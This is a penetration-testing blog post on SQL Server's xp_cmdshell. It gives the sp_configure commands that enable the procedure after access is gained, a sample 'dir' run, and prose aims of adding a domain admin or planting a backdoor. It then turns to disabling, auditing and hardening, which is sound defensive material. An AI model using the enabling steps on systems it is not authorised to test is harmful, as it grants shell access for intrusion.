0wn!ng using xp_cmdshell

Background

Well, we all know xp_cmdshell and its history. It is an extended stored procedure that spawns a Windows command shell and executes the string passed to it as a command. The point is: what's the big deal?

Impact

The moment you get access to an MS SQL Server during a penetration test or vulnerability assessment, the next thing that comes to mind is to enable xp_cmdshell.

Why?

The simple reason is that it gives you a Windows shell from which you can execute Windows commands. Now there is no limit to someone's creativity in exploiting such a juicy finding. I would like to own the server by adding a domain admin user and owning the entire domain 🙂 Others would probably rather get into the network and plant a backdoor for later use; everybody has their own choices.

Usage

Before we can even use this shell we have to enable it first 🙂 To enable it, run the following commands:

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
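The following is an added check, not part of the original post, for verifying the state the commands above leave behind. In sys.configurations, value is the setting written by sp_configure and value_in_use is what the running instance actually honours; the two differ until RECONFIGURE has been run. Changing these options requires the ALTER SETTINGS server permission (held implicitly by the sysadmin and serveradmin roles), and calling xp_cmdshell directly requires sysadmin membership unless the ##xp_cmdshell_proxy_account## credential has been configured, so the second and third queries list who can actually use it.

```sql
-- Added example: verify the configuration state after enabling.
-- sys.configurations can be read without 'show advanced options' being on,
-- unlike EXEC sp_configure 'xp_cmdshell', which errors out for hidden options.
SELECT name, value, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
-- While enabled: value = 1 and value_in_use = 1 for xp_cmdshell.
-- value = 1 but value_in_use = 0 means RECONFIGURE has not been run yet.

-- Logins that can call xp_cmdshell directly (sysadmin members).
-- Members of Windows groups granted sysadmin are not expanded here.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- Non-sysadmin callers only work through the proxy credential.
-- An empty result means no proxy account is configured.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = N'##xp_cmdshell_proxy_account##';
```

The first query is the one to keep in a hardening checklist: it answers "is it on right now?" regardless of whether advanced options are visible, and the value/value_in_use pair tells you whether a change is pending.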

Now that we have enabled it, let's see how to use it. The procedure has the following syntax:

Usage:

xp_cmdshell { 'command_string' } [ , no_output ]

command_string: the command line to run, passed as a string.

no_output: optional; when specified, no output is returned to the client.

Example:

USE master;
EXEC xp_cmdshell 'dir';

Output

Volume in drive C has no label.
Volume Serial Number is E27A-3074

Directory of C:

02/02/2012  09:29 AM    <DIR>          common
06/11/2009  03:12 AM                10 config.sys
05/31/2011  04:12 PM    <DIR>          dell
09/27/2011  01:34 PM    <DIR>          inetpub
11/25/2011  02:31 PM            15,478 init.rc
05/31/2011  04:45 PM    <DIR>          Intel
10/20/2011  02:51 PM    <DIR>          OpenSSL-Win32
07/14/2009  08:07 AM    <DIR>          PerfLogs
09/24/2011  03:21 PM    <DIR>          Perl
03/26/2012  04:49 PM    <DIR>          Program Files
03/05/2012  11:40 AM    <DIR>          Python27
11/16/2011  09:46 AM    <DIR>          Temp
09/28/2011  12:01 PM    <DIR>          Users
03/26/2012  05:05 PM    <DIR>          Windows
09/23/2011  02:19 PM    <DIR>          xampp
12 File(s)        732,235 bytes
14 Dir(s)  62,720,782,336 bytes free

Now you can run any commands of your choice.

Solution

I will not stop at just how to enable and use xp_cmdshell; I will also show how to disable it. You can use the following commands to disable it:

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To disable the feature.
EXEC sp_configure 'xp_cmdshell', 0
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
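Disabling the option closes the door, but anyone holding sysadmin can reopen it with the same four statements, so you also want a record of who calls the procedure. The following is an added example, not from the original post, that uses SQL Server Audit (SQL Server 2008 and later) to log every EXECUTE of xp_cmdshell with the calling login, the statement text and whether it succeeded. The audit name Audit_xp_cmdshell, the specification name Audit_xp_cmdshell_exec and the path C:\SQLAudit\ are placeholders of mine; the directory must exist and be writable by the SQL Server service account, and a database audit specification has to be created in the database that owns the object, which for xp_cmdshell is master.

```sql
USE master;
GO
-- Added example: server-level audit writing to rolling files under a placeholder path.
CREATE SERVER AUDIT Audit_xp_cmdshell
TO FILE (FILEPATH = N'C:\SQLAudit\', MAXSIZE = 100 MB, MAX_ROLLOVER_FILES = 10)
WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
ALTER SERVER AUDIT Audit_xp_cmdshell WITH (STATE = ON);
GO
-- xp_cmdshell is a system extended procedure in master's sys schema.
-- Auditing EXECUTE "BY public" covers every login, sysadmin members included.
CREATE DATABASE AUDIT SPECIFICATION Audit_xp_cmdshell_exec
FOR SERVER AUDIT Audit_xp_cmdshell
ADD (EXECUTE ON OBJECT::sys.xp_cmdshell BY public)
WITH (STATE = ON);
GO
-- Read back what has been captured: who ran what, and whether it succeeded.
SELECT event_time, server_principal_name, succeeded, statement
FROM sys.fn_get_audit_file(N'C:\SQLAudit\*.sqlaudit', DEFAULT, DEFAULT)
ORDER BY event_time DESC;
```

Pair the audit with the sys.configurations query from the enabling section in a scheduled check: the audit tells you who used the shell, and the configuration query tells you whether someone has turned it back on since you disabled it.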

Conclusion

Use best practices: keep xp_cmdshell disabled (it is off by default), limit the sysadmin role to the accounts that genuinely need it, and run the SQL Server service under a low-privilege account so that even an enabled xp_cmdshell yields a shell with limited rights.
